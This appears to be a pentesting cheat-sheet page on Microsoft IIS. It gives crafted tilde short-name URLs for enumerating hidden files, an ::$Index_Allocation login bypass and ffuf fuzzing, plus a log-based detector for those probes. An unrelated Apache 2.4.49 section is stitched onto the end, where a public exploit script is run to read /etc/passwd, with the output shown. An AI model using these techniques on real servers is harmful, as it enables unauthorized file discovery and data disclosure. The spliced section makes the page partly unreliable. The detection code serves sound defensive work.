IIS

101

IIS (Internet Information Services) is a web server software made by Microsoft. It runs on Windows and is used to host websites, web applications, and services. It's commonly used for websites built with ASP.NET and other Microsoft technologies.

Directories

Webroot

C:\inetpub\wwwroot\

Config

  • %windir%\System32\inetsrv\config\applicationHost.config

  • C:\inetpub\wwwroot\web.config

Logs

C:\inetpub\logs\LogFiles\

Attacks

Tilde Flaw

Dirbusting

In older versions of Microsoft’s IIS, there's a way to discover hidden files and folders using something called 8.3 short file names. These are legacy DOS-style names (e.g., SECRET~1.HTM) automatically created for files like AcSecret.html. By using the tilde character (~) in a crafted URL, we can enumerate or guess these hidden names, even if the files are protected or not listed publicly.

When a server uses short file names, it maps a long filename like AcSecret.html to a short one like ACSECR~1.HTM. This behavior can be abused via URLs with wildcards (*, ?) and the tilde ~. For example:

http://victim.com/acsecr~1.htm/.aspx

If the server responds with a 404 (not found) instead of a 400 (bad request), it means the file exists — we've guessed part of a real filename! We can refine the guess:

  1. Use a*~1*/.aspx to test if a file starts with a

  2. Keep adjusting letters (ab*, ac*, etc.) until the server gives clues

For example, if enumeration yields a result such as http://10.10.10.10/file_co~1.txt, the long filename starts with file_co, so a wordlist can be narrowed to candidates beginning with co and fuzzed:

# Extract the words starting with 'co'
$ grep '^co.*' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > start_with_co.txt

# Fuzz the file name
$ ffuf -w start_with_co.txt -u http://10.10.10.10/file_FUZZ.txt -ic -ac -c
...
connection    [Status: 200, Size: 142, Words: 3, Lines: 7, Duration: 35ms

The .aspx at the end of the URL is used because of a behavioral quirk of IIS that lets existing 8.3 names be detected through differing HTTP responses. IIS needs a valid extension at the end to route the request correctly. If the URL ends in something non-executable like .htm, or has no extension at all, IIS may return a generic response (like a 404 or 403) instead of one we can differentiate.

Adding /.aspx (or /anything.aspx) can force IIS to treat the path as a route to an ASP.NET resource, and might produce different error codes depending on whether the target file/folder actually exists or not. Let’s say we try:

http://victim.com/secretfo~1/

If the folder doesn’t exist, the server will respond with 404 Not Found, but if it exists it might still return 404 or 403 depending on settings. On the other hand, if we try:

http://victim.com/secretfo~1/.aspx

If the folder exists, IIS may return a 403 (Forbidden), whereas if it doesn’t exist, it may return a 404 (Not Found).

Bypassing Authentication

Even if a folder is protected with login prompts (like Basic or Windows auth), we can still enumerate files using a trick:

/ProtectedFolder::$Index_Allocation/*~1*/.aspx

This vector bypasses the login wall and lets us see what's inside as long as short names exist.

Alternate Data Streams

NTFS, the default file system used by modern versions of Windows, has a feature called ADS (Alternate Data Streams) that can help us check if a file exists based on the HTTP responses:

/filename.html::$data/~1/.aspx

A 404 usually means the file is there, just not accessible directly.
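All three vectors above (wildcard short-name guesses ending in /.aspx, the ::$Index_Allocation authentication bypass and the ::$data stream check) leave a recognisable footprint in the IIS W3C logs under C:\inetpub\logs\LogFiles\. The following detector is an added example written for this page, not a tool from the original text: it parses constructed W3C log lines (the #Fields directive defines the columns), flags request stems that carry a DOS short-name tail (~ followed by a digit) together with a wildcard, a ::$ stream suffix or a trailing /.aspx, and aggregates the probes per client IP with their status-code mix. The sample log, the threshold of 3 probes and the field layout are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample of IIS W3C extended log lines for this example (not from a real server).
# Column order follows the #Fields directive exactly as IIS writes it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 00:00:01 10.0.0.5 GET /index.html - 80 - 10.0.0.7 Mozilla/5.0 200 0 0 12
2024-01-01 00:00:02 10.0.0.5 GET /a*~1*/.aspx - 80 - 203.0.113.9 Mozilla/5.0 404 0 2 5
2024-01-01 00:00:02 10.0.0.5 GET /b*~1*/.aspx - 80 - 203.0.113.9 Mozilla/5.0 400 0 0 4
2024-01-01 00:00:03 10.0.0.5 GET /acsecr~1.htm/.aspx - 80 - 203.0.113.9 Mozilla/5.0 404 0 2 6
2024-01-01 00:00:04 10.0.0.5 GET /ProtectedFolder::$Index_Allocation/*~1*/.aspx - 80 - 203.0.113.9 Mozilla/5.0 404 0 2 7
2024-01-01 00:00:05 10.0.0.5 GET /filename.html::$data/~1/.aspx - 80 - 203.0.113.9 Mozilla/5.0 404 0 2 5
2024-01-01 00:00:06 10.0.0.5 GET /about.html - 80 - 10.0.0.8 Mozilla/5.0 200 0 0 9
2024-01-01 00:00:07 10.0.0.5 GET /~user/page.html - 80 - 10.0.0.8 Mozilla/5.0 200 0 0 9
"""

SHORTNAME = re.compile(r"~\d")                 # 8.3 numeric tail: acsecr~1, *~1*
WILDCARD = re.compile(r"[*?]")                 # wildcard characters used to guess names
STREAM = re.compile(r"::\$", re.IGNORECASE)    # NTFS stream/attribute syntax (::$data, ::$Index_Allocation)
ASPX_SUFFIX = re.compile(r"/[^/]*\.aspx$", re.IGNORECASE)  # trailing /.aspx or /anything.aspx


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line seen before any #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than mis-assign columns
        yield dict(zip(fields, parts))


def is_shortname_probe(stem):
    """True when the URI stem looks like tilde short-name enumeration.

    A bare ~<digit> is not enough (legitimate files can carry short names);
    it must be combined with a wildcard, a ::$ stream suffix or the /.aspx trick.
    """
    if not SHORTNAME.search(stem):
        return False
    return bool(WILDCARD.search(stem) or STREAM.search(stem) or ASPX_SUFFIX.search(stem))


def detect(text, threshold=3):
    """Aggregate short-name probes per client IP; 'alert' is set at or above threshold."""
    per_ip = defaultdict(lambda: {"probes": 0, "statuses": defaultdict(int), "examples": []})
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        if not is_shortname_probe(stem):
            continue
        entry = per_ip[rec["c-ip"]]
        entry["probes"] += 1
        entry["statuses"][rec["sc-status"]] += 1  # 400 vs 404 mix is the enumeration oracle
        if len(entry["examples"]) < 3:
            entry["examples"].append(stem)
    return {
        ip: {
            "probes": e["probes"],
            "statuses": dict(e["statuses"]),
            "examples": e["examples"],
            "alert": e["probes"] >= threshold,
        }
        for ip, e in per_ip.items()
    }


if __name__ == "__main__":
    for ip, summary in detect(SAMPLE_LOG).items():
        print(ip, summary)
```

Requiring the tilde to be followed by a digit keeps user-home style paths such as /~user/ out of the results, and the per-IP 400/404 split is worth surfacing in the alert because that status difference is exactly the oracle the enumeration relies on.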

Tools

The tilde enumeration can be automated using tools such as shortscan or Metasploit's iis_shortname_scanner module:

# Single target
$ shortscan http://example.org/

# File with a list of URLs
$ shortscan @urls.txt

v2.4.49

# Search for public exploits
$ searchsploit Apache httpd 2.4.49
...
--------------------------------------------------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
--------------------------------------------------------------------------

# Create a file with the target's socket
$ echo "192.168.X.245:8000" > web01_ip.txt

# Exploit the target
$ ./50383.sh web01_ip.txt /etc/passwd
http://192.168.X.245:8000
root:x:0:0:root:/root:/bin/bash
...
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
